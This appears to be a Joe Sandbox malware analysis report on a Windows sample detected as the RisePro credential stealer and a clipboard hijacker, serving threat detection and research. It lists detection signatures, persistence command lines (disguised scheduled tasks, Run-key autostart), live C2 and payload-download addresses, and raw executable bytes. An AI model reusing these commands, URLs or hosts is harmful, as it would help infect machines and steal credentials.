Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1443534
MD5:3d09739846543f4962f2b432da671c29
SHA1:2247e38b1f5257df93db091328488c652f6bea0a
SHA256:70aaa6e67944e919f8c7bbdf71b6b09deed41f51166bc1dc15fc6f66efc1b014
Tags:exe
Infos:

Detection

Clipboard Hijacker, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3D09739846543F4962F2B432DA671C29)
    • schtasks.exe (PID: 3692 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6668 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • llmcrdwzLnNKYB4T0Vnw.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
      • schtasks.exe (PID: 5728 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSIUpdaterV2.exe (PID: 6504 cmdline: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
    • schtasks.exe (PID: 6968 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSIUpdaterV2.exe (PID: 1628 cmdline: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • oobeldr.exe (PID: 7044 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
    • schtasks.exe (PID: 2504 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdobeUpdaterV2.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • AdobeUpdaterV2.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • EdgeMS2.exe (PID: 2860 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
    • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
    00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmpWindows_Trojan_Clipbanker_787b130bunknownunknown
    • 0x1354:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
    00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
        00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
        • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.MSIUpdaterV2.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
          8.2.MSIUpdaterV2.exe.400000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x6c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          8.2.MSIUpdaterV2.exe.400000.0.unpackWindows_Trojan_Clipbanker_787b130bunknownunknown
          • 0x1554:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
          7.2.MSIUpdaterV2.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
            7.2.MSIUpdaterV2.exe.400000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
            • 0x6c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
            Click to see the 16 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe, ParentProcessId: 7056, ParentProcessName: llmcrdwzLnNKYB4T0Vnw.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", ProcessId: 5728, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe, ParentProcessId: 7056, ParentProcessName: llmcrdwzLnNKYB4T0Vnw.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", ProcessId: 5728, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:05/17/24-23:45:00.848746
            SID:2049060
            Source Port:49704
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/17/24-23:45:05.461512
            SID:2046269
            Source Port:49704
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/17/24-23:45:05.093768
            SID:2046268
            Source Port:49704
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/17/24-23:45:14.161367
            SID:2019714
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:05/17/24-23:45:02.216807
            SID:2046267
            Source Port:50500
            Destination Port:49704
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/17/24-23:45:01.844974
            SID:2046266
            Source Port:50500
            Destination Port:49704
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exeAvira: detection malicious, Label: HEUR/AGEN.1304053
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
            Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
            Multi AV Scanner detection for dropped file
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeReversingLabs: Detection: 83%
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeReversingLabs: Detection: 83%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exeReversingLabs: Detection: 83%
            Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeReversingLabs: Detection: 83%
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeReversingLabs: Detection: 83%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeReversingLabs: Detection: 83%
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D7CCFD FindFirstFileExW,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49704 -> 5.42.96.65:50500
            Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49704
            Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.96.65:50500 -> 192.168.2.5:49704
            Source: TrafficSnort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49704 -> 5.42.96.65:50500
            Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49704 -> 5.42.96.65:50500
            Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49707 -> 5.42.96.170:80
            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 5.42.96.65:50500
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 17 May 2024 21:45:14 GMTServer: Apache/2.4.59 (Debian)Last-Modified: Thu, 16 May 2024 16:35:58 GMTETag: "45a2b8-61894d4759081"Accept-Ranges: bytesContent-Length: 4563640Content-Type: application/x-msdos-programData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d c2 aa
            Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
            Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
            Source: Joe Sandbox ViewIP Address: 5.42.96.65 5.42.96.65
            Source: Joe Sandbox ViewIP Address: 172.67.75.166 172.67.75.166
            Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
            Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: unknownDNS query: name: ipinfo.io
            Source: unknownDNS query: name: ipinfo.io
            Source: global trafficHTTP traffic detected: GET /widget/demo/12.205.151.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
            Source: global trafficHTTP traffic detected: GET /demo/home.php?s=12.205.151.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
            Source: global trafficHTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.96.170Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.96.170Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D41980 SetThreadExecutionState,SetThreadExecutionState,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,recv,WSAGetLastError,__aulldiv,__aulldiv,send,recv,recv,recv,recv,Sleep,Sleep,
            Source: global trafficHTTP traffic detected: GET /widget/demo/12.205.151.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
            Source: global trafficHTTP traffic detected: GET /demo/home.php?s=12.205.151.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
            Source: global trafficHTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.96.170Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
            Source: global trafficDNS traffic detected: DNS query: db-ip.com
            Source: global trafficDNS traffic detected: DNS query: kuljyftgjk.online
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.96.170/server/k/l2.exe
